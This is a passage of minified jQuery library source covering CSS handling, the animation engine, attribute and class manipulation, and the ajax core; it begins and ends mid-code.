b,c,d=l.documentElement,e=l.createElement("div"),f=l.createElement("div");if(f.style){f.style.backgroundClip="content-box",f.cloneNode(!0).style.backgroundClip="",k.clearCloneStyle="content-box"===f.style.backgroundClip,e.style.cssText="border:0;width:0;height:0;top:0;left:-9999px;margin-top:1px;position:absolute",e.appendChild(f);function g(){f.style.cssText="-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box;display:block;margin-top:1%;top:1%;border:1px;padding:1px;width:4px;position:absolute",f.innerHTML="",d.appendChild(e);var g=a.getComputedStyle(f,null);b="1%"!==g.top,c="4px"===g.width,d.removeChild(e)}a.getComputedStyle&&n.extend(k,{pixelPosition:function(){return g(),b},boxSizingReliable:function(){return null==c&&g(),c},reliableMarginRight:function(){var b,c=f.appendChild(l.createElement("div"));return c.style.cssText=f.style.cssText="-webkit-box-sizing:content-box;-moz-box-sizing:content-box;box-sizing:content-box;display:block;margin:0;border:0;padding:0",c.style.marginRight=c.style.width="0",f.style.width="1px",d.appendChild(e),b=!parseFloat(a.getComputedStyle(c,null).marginRight),d.removeChild(e),b}})}}(),n.swap=function(a,b,c,d){var e,f,g={};for(f in b)g[f]=a.style[f],a.style[f]=b[f];e=c.apply(a,d||[]);for(f in b)a.style[f]=g[f];return e};var zb=/^(none|table(?!-c[ea]).+)/,Ab=new RegExp("^("+Q+")(.*)$","i"),Bb=new RegExp("^([+-])=("+Q+")","i"),Cb={position:"absolute",visibility:"hidden",display:"block"},Db={letterSpacing:"0",fontWeight:"400"},Eb=["Webkit","O","Moz","ms"];function Fb(a,b){if(b in a)return b;var c=b[0].toUpperCase()+b.slice(1),d=b,e=Eb.length;while(e--)if(b=Eb[e]+c,b in a)return b;return d}function Gb(a,b,c){var d=Ab.exec(b);return d?Math.max(0,d[1]-(c||0))+(d[2]||"px"):b}function Hb(a,b,c,d,e){for(var f=c===(d?"border":"content")?4:"width"===b?1:0,g=0;4>f;f+=2)"margin"===c&&(g+=n.css(a,c+R[f],!0,e)),d?("content"===c&&(g-=n.css(a,"padding"+R[f],!0,e)),"margin"!==c&&(g-=n.css(a,"border"+R[f]+"Width",!0,e))):(g+=n.css(a,"padding"+R[f],!0,e),"padding"!==c&&(g+=n.css(a,"border"+R[f]+"Width",!0,e)));return g}function Ib(a,b,c){var d=!0,e="width"===b?a.offsetWidth:a.offsetHeight,f=wb(a),g="border-box"===n.css(a,"boxSizing",!1,f);if(0>=e||null==e){if(e=xb(a,b,f),(0>e||null==e)&&(e=a.style[b]),vb.test(e))return e;d=g&&(k.boxSizingReliable()||e===a.style[b]),e=parseFloat(e)||0}return e+Hb(a,b,c||(g?"border":"content"),d,f)+"px"}function Jb(a,b){for(var c,d,e,f=[],g=0,h=a.length;h>g;g++)d=a[g],d.style&&(f[g]=L.get(d,"olddisplay"),c=d.style.display,b?(f[g]||"none"!==c||(d.style.display=""),""===d.style.display&&S(d)&&(f[g]=L.access(d,"olddisplay",tb(d.nodeName)))):(e=S(d),"none"===c&&e||L.set(d,"olddisplay",e?c:n.css(d,"display"))));for(g=0;h>g;g++)d=a[g],d.style&&(b&&"none"!==d.style.display&&""!==d.style.display||(d.style.display=b?f[g]||"":"none"));return a}n.extend({cssHooks:{opacity:{get:function(a,b){if(b){var c=xb(a,"opacity");return""===c?"1":c}}}},cssNumber:{columnCount:!0,fillOpacity:!0,flexGrow:!0,flexShrink:!0,fontWeight:!0,lineHeight:!0,opacity:!0,order:!0,orphans:!0,widows:!0,zIndex:!0,zoom:!0},cssProps:{"float":"cssFloat"},style:function(a,b,c,d){if(a&&3!==a.nodeType&&8!==a.nodeType&&a.style){var e,f,g,h=n.camelCase(b),i=a.style;return b=n.cssProps[h]||(n.cssProps[h]=Fb(i,h)),g=n.cssHooks[b]||n.cssHooks[h],void 0===c?g&&"get"in g&&void 0!==(e=g.get(a,!1,d))?e:i[b]:(f=typeof c,"string"===f&&(e=Bb.exec(c))&&(c=(e[1]+1)*e[2]+parseFloat(n.css(a,b)),f="number"),null!=c&&c===c&&("number"!==f||n.cssNumber[h]||(c+="px"),k.clearCloneStyle||""!==c||0!==b.indexOf("background")||(i[b]="inherit"),g&&"set"in g&&void 0===(c=g.set(a,c,d))||(i[b]=c)),void 0)}},css:function(a,b,c,d){var e,f,g,h=n.camelCase(b);return b=n.cssProps[h]||(n.cssProps[h]=Fb(a.style,h)),g=n.cssHooks[b]||n.cssHooks[h],g&&"get"in g&&(e=g.get(a,!0,c)),void 0===e&&(e=xb(a,b,d)),"normal"===e&&b in Db&&(e=Db[b]),""===c||c?(f=parseFloat(e),c===!0||n.isNumeric(f)?f||0:e):e}}),n.each(["height","width"],function(a,b){n.cssHooks[b]={get:function(a,c,d){return c?zb.test(n.css(a,"display"))&&0===a.offsetWidth?n.swap(a,Cb,function(){return Ib(a,b,d)}):Ib(a,b,d):void 0},set:function(a,c,d){var e=d&&wb(a);return Gb(a,c,d?Hb(a,b,d,"border-box"===n.css(a,"boxSizing",!1,e),e):0)}}}),n.cssHooks.marginRight=yb(k.reliableMarginRight,function(a,b){return b?n.swap(a,{display:"inline-block"},xb,[a,"marginRight"]):void 0}),n.each({margin:"",padding:"",border:"Width"},function(a,b){n.cssHooks[a+b]={expand:function(c){for(var d=0,e={},f="string"==typeof c?c.split(" "):[c];4>d;d++)e[a+R[d]+b]=f[d]||f[d-2]||f[0];return e}},ub.test(a)||(n.cssHooks[a+b].set=Gb)}),n.fn.extend({css:function(a,b){return J(this,function(a,b,c){var d,e,f={},g=0;if(n.isArray(b)){for(d=wb(a),e=b.length;e>g;g++)f[b[g]]=n.css(a,b[g],!1,d);return f}return void 0!==c?n.style(a,b,c):n.css(a,b)},a,b,arguments.length>1)},show:function(){return Jb(this,!0)},hide:function(){return Jb(this)},toggle:function(a){return"boolean"==typeof a?a?this.show():this.hide():this.each(function(){S(this)?n(this).show():n(this).hide()})}});function Kb(a,b,c,d,e){return new Kb.prototype.init(a,b,c,d,e)}n.Tween=Kb,Kb.prototype={constructor:Kb,init:function(a,b,c,d,e,f){this.elem=a,this.prop=c,this.easing=e||"swing",this.options=b,this.start=this.now=this.cur(),this.end=d,this.unit=f||(n.cssNumber[c]?"":"px")},cur:function(){var a=Kb.propHooks[this.prop];return a&&a.get?a.get(this):Kb.propHooks._default.get(this)},run:function(a){var b,c=Kb.propHooks[this.prop];return this.pos=b=this.options.duration?n.easing[this.easing](a,this.options.duration*a,0,1,this.options.duration):a,this.now=(this.end-this.start)*b+this.start,this.options.step&&this.options.step.call(this.elem,this.now,this),c&&c.set?c.set(this):Kb.propHooks._default.set(this),this}},Kb.prototype.init.prototype=Kb.prototype,Kb.propHooks={_default:{get:function(a){var b;return null==a.elem[a.prop]||a.elem.style&&null!=a.elem.style[a.prop]?(b=n.css(a.elem,a.prop,""),b&&"auto"!==b?b:0):a.elem[a.prop]},set:function(a){n.fx.step[a.prop]?n.fx.step[a.prop](a):a.elem.style&&(null!=a.elem.style[n.cssProps[a.prop]]||n.cssHooks[a.prop])?n.style(a.elem,a.prop,a.now+a.unit):a.elem[a.prop]=a.now}}},Kb.propHooks.scrollTop=Kb.propHooks.scrollLeft={set:function(a){a.elem.nodeType&&a.elem.parentNode&&(a.elem[a.prop]=a.now)}},n.easing={linear:function(a){return a},swing:function(a){return.5-Math.cos(a*Math.PI)/2}},n.fx=Kb.prototype.init,n.fx.step={};var Lb,Mb,Nb=/^(?:toggle|show|hide)$/,Ob=new RegExp("^(?:([+-])=|)("+Q+")([a-z%]*)$","i"),Pb=/queueHooks$/,Qb=[Vb],Rb={"*":[function(a,b){var c=this.createTween(a,b),d=c.cur(),e=Ob.exec(b),f=e&&e[3]||(n.cssNumber[a]?"":"px"),g=(n.cssNumber[a]||"px"!==f&&+d)&&Ob.exec(n.css(c.elem,a)),h=1,i=20;if(g&&g[3]!==f){f=f||g[3],e=e||[],g=+d||1;do h=h||".5",g/=h,n.style(c.elem,a,g+f);while(h!==(h=c.cur()/d)&&1!==h&&--i)}return e&&(g=c.start=+g||+d||0,c.unit=f,c.end=e[1]?g+(e[1]+1)*e[2]:+e[2]),c}]};function Sb(){return setTimeout(function(){Lb=void 0}),Lb=n.now()}function Tb(a,b){var c,d=0,e={height:a};for(b=b?1:0;4>d;d+=2-b)c=R[d],e["margin"+c]=e["padding"+c]=a;return b&&(e.opacity=e.width=a),e}function Ub(a,b,c){for(var d,e=(Rb[b]||[]).concat(Rb["*"]),f=0,g=e.length;g>f;f++)if(d=e[f].call(c,b,a))return d}function Vb(a,b,c){var d,e,f,g,h,i,j,k,l=this,m={},o=a.style,p=a.nodeType&&S(a),q=L.get(a,"fxshow");c.queue||(h=n._queueHooks(a,"fx"),null==h.unqueued&&(h.unqueued=0,i=h.empty.fire,h.empty.fire=function(){h.unqueued||i()}),h.unqueued++,l.always(function(){l.always(function(){h.unqueued--,n.queue(a,"fx").length||h.empty.fire()})})),1===a.nodeType&&("height"in b||"width"in b)&&(c.overflow=[o.overflow,o.overflowX,o.overflowY],j=n.css(a,"display"),k="none"===j?L.get(a,"olddisplay")||tb(a.nodeName):j,"inline"===k&&"none"===n.css(a,"float")&&(o.display="inline-block")),c.overflow&&(o.overflow="hidden",l.always(function(){o.overflow=c.overflow[0],o.overflowX=c.overflow[1],o.overflowY=c.overflow[2]}));for(d in b)if(e=b[d],Nb.exec(e)){if(delete b[d],f=f||"toggle"===e,e===(p?"hide":"show")){if("show"!==e||!q||void 0===q[d])continue;p=!0}m[d]=q&&q[d]||n.style(a,d)}else j=void 0;if(n.isEmptyObject(m))"inline"===("none"===j?tb(a.nodeName):j)&&(o.display=j);else{q?"hidden"in q&&(p=q.hidden):q=L.access(a,"fxshow",{}),f&&(q.hidden=!p),p?n(a).show():l.done(function(){n(a).hide()}),l.done(function(){var b;L.remove(a,"fxshow");for(b in m)n.style(a,b,m[b])});for(d in m)g=Ub(p?q[d]:0,d,l),d in q||(q[d]=g.start,p&&(g.end=g.start,g.start="width"===d||"height"===d?1:0))}}function Wb(a,b){var c,d,e,f,g;for(c in a)if(d=n.camelCase(c),e=b[d],f=a[c],n.isArray(f)&&(e=f[1],f=a[c]=f[0]),c!==d&&(a[d]=f,delete a[c]),g=n.cssHooks[d],g&&"expand"in g){f=g.expand(f),delete a[d];for(c in f)c in a||(a[c]=f[c],b[c]=e)}else b[d]=e}function Xb(a,b,c){var d,e,f=0,g=Qb.length,h=n.Deferred().always(function(){delete i.elem}),i=function(){if(e)return!1;for(var b=Lb||Sb(),c=Math.max(0,j.startTime+j.duration-b),d=c/j.duration||0,f=1-d,g=0,i=j.tweens.length;i>g;g++)j.tweens[g].run(f);return h.notifyWith(a,[j,f,c]),1>f&&i?c:(h.resolveWith(a,[j]),!1)},j=h.promise({elem:a,props:n.extend({},b),opts:n.extend(!0,{specialEasing:{}},c),originalProperties:b,originalOptions:c,startTime:Lb||Sb(),duration:c.duration,tweens:[],createTween:function(b,c){var d=n.Tween(a,j.opts,b,c,j.opts.specialEasing[b]||j.opts.easing);return j.tweens.push(d),d},stop:function(b){var c=0,d=b?j.tweens.length:0;if(e)return this;for(e=!0;d>c;c++)j.tweens[c].run(1);return b?h.resolveWith(a,[j,b]):h.rejectWith(a,[j,b]),this}}),k=j.props;for(Wb(k,j.opts.specialEasing);g>f;f++)if(d=Qb[f].call(j,a,k,j.opts))return d;return n.map(k,Ub,j),n.isFunction(j.opts.start)&&j.opts.start.call(a,j),n.fx.timer(n.extend(i,{elem:a,anim:j,queue:j.opts.queue})),j.progress(j.opts.progress).done(j.opts.done,j.opts.complete).fail(j.opts.fail).always(j.opts.always)}n.Animation=n.extend(Xb,{tweener:function(a,b){n.isFunction(a)?(b=a,a=["*"]):a=a.split(" ");for(var c,d=0,e=a.length;e>d;d++)c=a[d],Rb[c]=Rb[c]||[],Rb[c].unshift(b)},prefilter:function(a,b){b?Qb.unshift(a):Qb.push(a)}}),n.speed=function(a,b,c){var d=a&&"object"==typeof a?n.extend({},a):{complete:c||!c&&b||n.isFunction(a)&&a,duration:a,easing:c&&b||b&&!n.isFunction(b)&&b};return d.duration=n.fx.off?0:"number"==typeof d.duration?d.duration:d.duration in n.fx.speeds?n.fx.speeds[d.duration]:n.fx.speeds._default,(null==d.queue||d.queue===!0)&&(d.queue="fx"),d.old=d.complete,d.complete=function(){n.isFunction(d.old)&&d.old.call(this),d.queue&&n.dequeue(this,d.queue)},d},n.fn.extend({fadeTo:function(a,b,c,d){return this.filter(S).css("opacity",0).show().end().animate({opacity:b},a,c,d)},animate:function(a,b,c,d){var e=n.isEmptyObject(a),f=n.speed(b,c,d),g=function(){var b=Xb(this,n.extend({},a),f);(e||L.get(this,"finish"))&&b.stop(!0)};return g.finish=g,e||f.queue===!1?this.each(g):this.queue(f.queue,g)},stop:function(a,b,c){var d=function(a){var b=a.stop;delete a.stop,b(c)};return"string"!=typeof a&&(c=b,b=a,a=void 0),b&&a!==!1&&this.queue(a||"fx",[]),this.each(function(){var b=!0,e=null!=a&&a+"queueHooks",f=n.timers,g=L.get(this);if(e)g[e]&&g[e].stop&&d(g[e]);else for(e in g)g[e]&&g[e].stop&&Pb.test(e)&&d(g[e]);for(e=f.length;e--;)f[e].elem!==this||null!=a&&f[e].queue!==a||(f[e].anim.stop(c),b=!1,f.splice(e,1));(b||!c)&&n.dequeue(this,a)})},finish:function(a){return a!==!1&&(a=a||"fx"),this.each(function(){var b,c=L.get(this),d=c[a+"queue"],e=c[a+"queueHooks"],f=n.timers,g=d?d.length:0;for(c.finish=!0,n.queue(this,a,[]),e&&e.stop&&e.stop.call(this,!0),b=f.length;b--;)f[b].elem===this&&f[b].queue===a&&(f[b].anim.stop(!0),f.splice(b,1));for(b=0;g>b;b++)d[b]&&d[b].finish&&d[b].finish.call(this);delete c.finish})}}),n.each(["toggle","show","hide"],function(a,b){var c=n.fn[b];n.fn[b]=function(a,d,e){return null==a||"boolean"==typeof a?c.apply(this,arguments):this.animate(Tb(b,!0),a,d,e)}}),n.each({slideDown:Tb("show"),slideUp:Tb("hide"),slideToggle:Tb("toggle"),fadeIn:{opacity:"show"},fadeOut:{opacity:"hide"},fadeToggle:{opacity:"toggle"}},function(a,b){n.fn[a]=function(a,c,d){return this.animate(b,a,c,d)}}),n.timers=[],n.fx.tick=function(){var a,b=0,c=n.timers;for(Lb=n.now();b<c.length;b++)a=c[b],a()||c[b]!==a||c.splice(b--,1);c.length||n.fx.stop(),Lb=void 0},n.fx.timer=function(a){n.timers.push(a),a()?n.fx.start():n.timers.pop()},n.fx.interval=13,n.fx.start=function(){Mb||(Mb=setInterval(n.fx.tick,n.fx.interval))},n.fx.stop=function(){clearInterval(Mb),Mb=null},n.fx.speeds={slow:600,fast:200,_default:400},n.fn.delay=function(a,b){return a=n.fx?n.fx.speeds[a]||a:a,b=b||"fx",this.queue(b,function(b,c){var d=setTimeout(b,a);c.stop=function(){clearTimeout(d)}})},function(){var a=l.createElement("input"),b=l.createElement("select"),c=b.appendChild(l.createElement("option"));a.type="checkbox",k.checkOn=""!==a.value,k.optSelected=c.selected,b.disabled=!0,k.optDisabled=!c.disabled,a=l.createElement("input"),a.value="t",a.type="radio",k.radioValue="t"===a.value}();var Yb,Zb,$b=n.expr.attrHandle;n.fn.extend({attr:function(a,b){return J(this,n.attr,a,b,arguments.length>1)},removeAttr:function(a){return this.each(function(){n.removeAttr(this,a)})}}),n.extend({attr:function(a,b,c){var d,e,f=a.nodeType;if(a&&3!==f&&8!==f&&2!==f)return typeof a.getAttribute===U?n.prop(a,b,c):(1===f&&n.isXMLDoc(a)||(b=b.toLowerCase(),d=n.attrHooks[b]||(n.expr.match.bool.test(b)?Zb:Yb)),void 0===c?d&&"get"in d&&null!==(e=d.get(a,b))?e:(e=n.find.attr(a,b),null==e?void 0:e):null!==c?d&&"set"in d&&void 0!==(e=d.set(a,c,b))?e:(a.setAttribute(b,c+""),c):void n.removeAttr(a,b))
     4 +},removeAttr:function(a,b){var c,d,e=0,f=b&&b.match(E);if(f&&1===a.nodeType)while(c=f[e++])d=n.propFix[c]||c,n.expr.match.bool.test(c)&&(a[d]=!1),a.removeAttribute(c)},attrHooks:{type:{set:function(a,b){if(!k.radioValue&&"radio"===b&&n.nodeName(a,"input")){var c=a.value;return a.setAttribute("type",b),c&&(a.value=c),b}}}}}),Zb={set:function(a,b,c){return b===!1?n.removeAttr(a,c):a.setAttribute(c,c),c}},n.each(n.expr.match.bool.source.match(/\w+/g),function(a,b){var c=$b[b]||n.find.attr;$b[b]=function(a,b,d){var e,f;return d||(f=$b[b],$b[b]=e,e=null!=c(a,b,d)?b.toLowerCase():null,$b[b]=f),e}});var _b=/^(?:input|select|textarea|button)$/i;n.fn.extend({prop:function(a,b){return J(this,n.prop,a,b,arguments.length>1)},removeProp:function(a){return this.each(function(){delete this[n.propFix[a]||a]})}}),n.extend({propFix:{"for":"htmlFor","class":"className"},prop:function(a,b,c){var d,e,f,g=a.nodeType;if(a&&3!==g&&8!==g&&2!==g)return f=1!==g||!n.isXMLDoc(a),f&&(b=n.propFix[b]||b,e=n.propHooks[b]),void 0!==c?e&&"set"in e&&void 0!==(d=e.set(a,c,b))?d:a[b]=c:e&&"get"in e&&null!==(d=e.get(a,b))?d:a[b]},propHooks:{tabIndex:{get:function(a){return a.hasAttribute("tabindex")||_b.test(a.nodeName)||a.href?a.tabIndex:-1}}}}),k.optSelected||(n.propHooks.selected={get:function(a){var b=a.parentNode;return b&&b.parentNode&&b.parentNode.selectedIndex,null}}),n.each(["tabIndex","readOnly","maxLength","cellSpacing","cellPadding","rowSpan","colSpan","useMap","frameBorder","contentEditable"],function(){n.propFix[this.toLowerCase()]=this});var ac=/[\t\r\n\f]/g;n.fn.extend({addClass:function(a){var b,c,d,e,f,g,h="string"==typeof a&&a,i=0,j=this.length;if(n.isFunction(a))return this.each(function(b){n(this).addClass(a.call(this,b,this.className))});if(h)for(b=(a||"").match(E)||[];j>i;i++)if(c=this[i],d=1===c.nodeType&&(c.className?(" "+c.className+" ").replace(ac," "):" ")){f=0;while(e=b[f++])d.indexOf(" "+e+" ")<0&&(d+=e+" ");g=n.trim(d),c.className!==g&&(c.className=g)}return this},removeClass:function(a){var b,c,d,e,f,g,h=0===arguments.length||"string"==typeof a&&a,i=0,j=this.length;if(n.isFunction(a))return this.each(function(b){n(this).removeClass(a.call(this,b,this.className))});if(h)for(b=(a||"").match(E)||[];j>i;i++)if(c=this[i],d=1===c.nodeType&&(c.className?(" "+c.className+" ").replace(ac," "):"")){f=0;while(e=b[f++])while(d.indexOf(" "+e+" ")>=0)d=d.replace(" "+e+" "," ");g=a?n.trim(d):"",c.className!==g&&(c.className=g)}return this},toggleClass:function(a,b){var c=typeof a;return"boolean"==typeof b&&"string"===c?b?this.addClass(a):this.removeClass(a):this.each(n.isFunction(a)?function(c){n(this).toggleClass(a.call(this,c,this.className,b),b)}:function(){if("string"===c){var b,d=0,e=n(this),f=a.match(E)||[];while(b=f[d++])e.hasClass(b)?e.removeClass(b):e.addClass(b)}else(c===U||"boolean"===c)&&(this.className&&L.set(this,"__className__",this.className),this.className=this.className||a===!1?"":L.get(this,"__className__")||"")})},hasClass:function(a){for(var b=" "+a+" ",c=0,d=this.length;d>c;c++)if(1===this[c].nodeType&&(" "+this[c].className+" ").replace(ac," ").indexOf(b)>=0)return!0;return!1}});var bc=/\r/g;n.fn.extend({val:function(a){var b,c,d,e=this[0];{if(arguments.length)return d=n.isFunction(a),this.each(function(c){var e;1===this.nodeType&&(e=d?a.call(this,c,n(this).val()):a,null==e?e="":"number"==typeof e?e+="":n.isArray(e)&&(e=n.map(e,function(a){return null==a?"":a+""})),b=n.valHooks[this.type]||n.valHooks[this.nodeName.toLowerCase()],b&&"set"in b&&void 0!==b.set(this,e,"value")||(this.value=e))});if(e)return b=n.valHooks[e.type]||n.valHooks[e.nodeName.toLowerCase()],b&&"get"in b&&void 0!==(c=b.get(e,"value"))?c:(c=e.value,"string"==typeof c?c.replace(bc,""):null==c?"":c)}}}),n.extend({valHooks:{option:{get:function(a){var b=n.find.attr(a,"value");return null!=b?b:n.trim(n.text(a))}},select:{get:function(a){for(var b,c,d=a.options,e=a.selectedIndex,f="select-one"===a.type||0>e,g=f?null:[],h=f?e+1:d.length,i=0>e?h:f?e:0;h>i;i++)if(c=d[i],!(!c.selected&&i!==e||(k.optDisabled?c.disabled:null!==c.getAttribute("disabled"))||c.parentNode.disabled&&n.nodeName(c.parentNode,"optgroup"))){if(b=n(c).val(),f)return b;g.push(b)}return g},set:function(a,b){var c,d,e=a.options,f=n.makeArray(b),g=e.length;while(g--)d=e[g],(d.selected=n.inArray(d.value,f)>=0)&&(c=!0);return c||(a.selectedIndex=-1),f}}}}),n.each(["radio","checkbox"],function(){n.valHooks[this]={set:function(a,b){return n.isArray(b)?a.checked=n.inArray(n(a).val(),b)>=0:void 0}},k.checkOn||(n.valHooks[this].get=function(a){return null===a.getAttribute("value")?"on":a.value})}),n.each("blur focus focusin focusout load resize scroll unload click dblclick mousedown mouseup mousemove mouseover mouseout mouseenter mouseleave change select submit keydown keypress keyup error contextmenu".split(" "),function(a,b){n.fn[b]=function(a,c){return arguments.length>0?this.on(b,null,a,c):this.trigger(b)}}),n.fn.extend({hover:function(a,b){return this.mouseenter(a).mouseleave(b||a)},bind:function(a,b,c){return this.on(a,null,b,c)},unbind:function(a,b){return this.off(a,null,b)},delegate:function(a,b,c,d){return this.on(b,a,c,d)},undelegate:function(a,b,c){return 1===arguments.length?this.off(a,"**"):this.off(b,a||"**",c)}});var cc=n.now(),dc=/\?/;n.parseJSON=function(a){return JSON.parse(a+"")},n.parseXML=function(a){var b,c;if(!a||"string"!=typeof a)return null;try{c=new DOMParser,b=c.parseFromString(a,"text/xml")}catch(d){b=void 0}return(!b||b.getElementsByTagName("parsererror").length)&&n.error("Invalid XML: "+a),b};var ec,fc,gc=/#.*$/,hc=/([?&])_=[^&]*/,ic=/^(.*?):[ \t]*([^\r\n]*)$/gm,jc=/^(?:about|app|app-storage|.+-extension|file|res|widget):$/,kc=/^(?:GET|HEAD)$/,lc=/^\/\//,mc=/^([\w.+-]+:)(?:\/\/(?:[^\/?#]*@|)([^\/?#:]*)(?::(\d+)|)|)/,nc={},oc={},pc="*/".concat("*");try{fc=location.href}catch(qc){fc=l.createElement("a"),fc.href="",fc=fc.href}ec=mc.exec(fc.toLowerCase())||[];function rc(a){return function(b,c){"string"!=typeof b&&(c=b,b="*");var d,e=0,f=b.toLowerCase().match(E)||[];if(n.isFunction(c))while(d=f[e++])"+"===d[0]?(d=d.slice(1)||"*",(a[d]=a[d]||[]).unshift(c)):(a[d]=a[d]||[]).push(c)}}function sc(a,b,c,d){var e={},f=a===oc;function g(h){var i;return e[h]=!0,n.each(a[h]||[],function(a,h){var j=h(b,c,d);return"string"!=typeof j||f||e[j]?f?!(i=j):void 0:(b.dataTypes.unshift(j),g(j),!1)}),i}return g(b.dataTypes[0])||!e["*"]&&g("*")}function tc(a,b){var c,d,e=n.ajaxSettings.flatOptions||{};for(c in b)void 0!==b[c]&&((e[c]?a:d||(d={}))[c]=b[c]);return d&&n.extend(!0,a,d),a}function uc(a,b,c){var d,e,f,g,h=a.contents,i=a.dataTypes;while("*"===i[0])i.shift(),void 0===d&&(d=a.mimeType||b.getResponseHeader("Content-Type"));if(d)for(e in h)if(h[e]&&h[e].test(d)){i.unshift(e);break}if(i[0]in c)f=i[0];else{for(e in c){if(!i[0]||a.converters[e+" "+i[0]]){f=e;break}g||(g=e)}f=f||g}return f?(f!==i[0]&&i.unshift(f),c[f]):void 0}function vc(a,b,c,d){var e,f,g,h,i,j={},k=a.dataTypes.slice();if(k[1])for(g in a.converters)j[g.toLowerCase()]=a.converters[g];f=k.shift();while(f)if(a.responseFields[f]&&(c[a.responseFields[f]]=b),!i&&d&&a.dataFilter&&(b=a.dataFilter(b,a.dataType)),i=f,f=k.shift())if("*"===f)f=i;else if("*"!==i&&i!==f){if(g=j[i+" "+f]||j["* "+f],!g)for(e in j)if(h=e.split(" "),h[1]===f&&(g=j[i+" "+h[0]]||j["* "+h[0]])){g===!0?g=j[e]:j[e]!==!0&&(f=h[0],k.unshift(h[1]));break}if(g!==!0)if(g&&a["throws"])b=g(b);else try{b=g(b)}catch(l){return{state:"parsererror",error:g?l:"No conversion from "+i+" to "+f}}}return{state:"success",data:b}}n.extend({active:0,lastModified:{},etag:{},ajaxSettings:{url:fc,type:"GET",isLocal:jc.test(ec[1]),global:!0,processData:!0,async:!0,contentType:"application/x-www-form-urlencoded; charset=UTF-8",accepts:{"*":pc,text:"text/plain",html:"text/html",xml:"application/xml, text/xml",json:"application/json, text/javascript"},contents:{xml:/xml/,html:/html/,json:/json/},responseFields:{xml:"responseXML",text:"responseText",json:"responseJSON"},converters:{"* text":String,"text html":!0,"text json":n.parseJSON,"text xml":n.parseXML},flatOptions:{url:!0,context:!0}},ajaxSetup:function(a,b){return b?tc(tc(a,n.ajaxSettings),b):tc(n.ajaxSettings,a)},ajaxPrefilter:rc(nc),ajaxTransport:rc(oc),ajax:function(a,b){"object"==typeof a&&(b=a,a=void 0),b=b||{};var c,d,e,f,g,h,i,j,k=n.ajaxSetup({},b),l=k.context||k,m=k.context&&(l.nodeType||l.jquery)?n(l):n.event,o=n.Deferred(),p=n.Callbacks("once memory"),q=k.statusCode||{},r={},s={},t=0,u="canceled",v={readyState:0,getResponseHeader:function(a){var b;if(2===t){if(!f){f={};while(b=ic.exec(e))f[b[1].toLowerCase()]=b[2]}b=f[a.toLowerCase()]}return null==b?null:b},getAllResponseHeaders:function(){return 2===t?e:null},setRequestHeader:function(a,b){var c=a.toLowerCase();return t||(a=s[c]=s[c]||a,r[a]=b),this},overrideMimeType:function(a){return t||(k.mimeType=a),this},statusCode:function(a){var b;if(a)if(2>t)for(b in a)q[b]=[q[b],a[b]];else v.always(a[v.status]);return this},abort:function(a){var b=a||u;return c&&c.abort(b),x(0,b),this}};if(o.promise(v).complete=p.add,v.success=v.done,v.error=v.fail,k.url=((a||k.url||fc)+"").replace(gc,"").replace(lc,ec[1]+"//"),k.type=b.method||b.type||k.method||k.type,k.dataTypes=n.trim(k.dataType||"*").toLowerCase().match(E)||[""],null==k.crossDomain&&(h=mc.exec(k.url.toLowerCase()),k.crossDomain=!(!h||h[1]===ec[1]&&h[2]===ec[2]&&(h[3]||("http:"===h[1]?"80":"443"))===(ec[3]||("http:"===ec[1]?"80":"443")))),k.data&&k.processData&&"string"!=typeof k.data&&(k.data=n.param(k.data,k.traditional)),sc(nc,k,b,v),2===t)return v;i=k.global,i&&0===n.active++&&n.event.trigger("ajaxStart"),k.type=k.type.toUpperCase(),k.hasContent=!kc.test(k.type),d=k.url,k.hasContent||(k.data&&(d=k.url+=(dc.test(d)?"&":"?")+k.data,delete k.data),k.cache===!1&&(k.url=hc.test(d)?d.replace(hc,"$1_="+cc++):d+(dc.test(d)?"&":"?")+"_="+cc++)),k.ifModified&&(n.lastModified[d]&&v.setRequestHeader("If-Modified-Since",n.lastModified[d]),n.etag[d]&&v.setRequestHeader("If-None-Match",n.etag[d])),(k.data&&k.hasContent&&k.contentType!==!1||b.contentType)&&v.setRequestHeader("Content-Type",k.contentType),v.setRequestHeader("Accept",k.dataTypes[0]&&k.accepts[k.dataTypes[0]]?k.accepts[k.dataTypes[0]]+("*"!==k.dataTypes[0]?", "+pc+"; q=0.01":""):k.accepts["*"]);for(j in k.headers)v.setRequestHeader(j,k.headers[j]);if(k.beforeSend&&(k.beforeSend.call(l,v,k)===!1||2===t))return v.abort();u="abort";for(j in{success:1,error:1,complete:1})v[j](k[j]);if(c=sc(oc,k,b,v)){v.readyState=1,i&&m.trigger("ajaxSend",[v,k]),k.async&&k.timeout>0&&(g=setTimeout(function(){v.abort("timeout")},k.timeout));try{t=1,c.send(r,x)}catch(w){if(!(2>t))throw w;x(-1,w)}}else x(-1,"No Transport");function x(a,b,f,h){var j,r,s,u,w,x=b;2!==t&&(t=2,g&&clearTimeout(g),c=void 0,e=h||"",v.readyState=a>0?4:0,j=a>=200&&300>a||304===a,f&&(u=uc(k,v,f)),u=vc(k,u,v,j),j?(k.ifModified&&(w=v.getResponseHeader("Last-Modified"),w&&(n.lastModified[d]=w),w=v.getResponseHeader("etag"),w&&(n.etag[d]=w)),204===a||"HEAD"===k.type?x="nocontent":304===a?x="notmodified":(x=u.state,r=u.data,s=u.error,j=!s)):(s=x,(a||!x)&&(x="error",0>a&&(a=0))),v.status=a,v.statusText=(b||x)+"",j?o.resolveWith(l,[r,x,v]):o.rejectWith(l,[v,x,s]),v.statusCode(q),q=void 0,i&&m.trigger(j?"ajaxSuccess":"ajaxError",[v,k,j?r:s]),p.fireWith(l,[v,x]),i&&(m.trigger("ajaxComplete",[v,k]),--n.active||n.event.trigger("ajaxStop")))}return v},getJSON:function(a,b,c){return n.get(a,b,c,"json")},getScript:function(a,b){return n.get(a,void 0,b,"script")}}),n.each(["get","post"],function(a,b){n[b]=function(a,c,d,e){return n.isFunction(c)&&(e=e||d,d=c,c=void 0),n.ajax({url:a,type:b,dataType:e,data:c,success:d})}}),n.each(["ajaxStart","ajaxStop","ajaxComplete","ajaxError","ajaxSuccess","ajaxSend"],function(a,b){n.fn[b]=function(a){return this.on(b,a)}}),n._evalUrl=function(a){return n.ajax({url:a,type:"GET",dataType:"script",async:!1,global:!1,"throws":!0})},n.fn.extend({wrapAll:function(a){var b;return n.isFunction(a)?this.each(function(b){n(this).wrapAll(a.call(this,b))}):(this[0]&&(b=n(a,this[0].ownerDocument).eq(0).clone(!0),this[0].parentNode&&b.insertBefore(this[0]),b.map(function(){var a=this;while(a.firstElementChild)a=a.firstElementChild;return a}).append(this)),this)},wrapInner:function(a){return 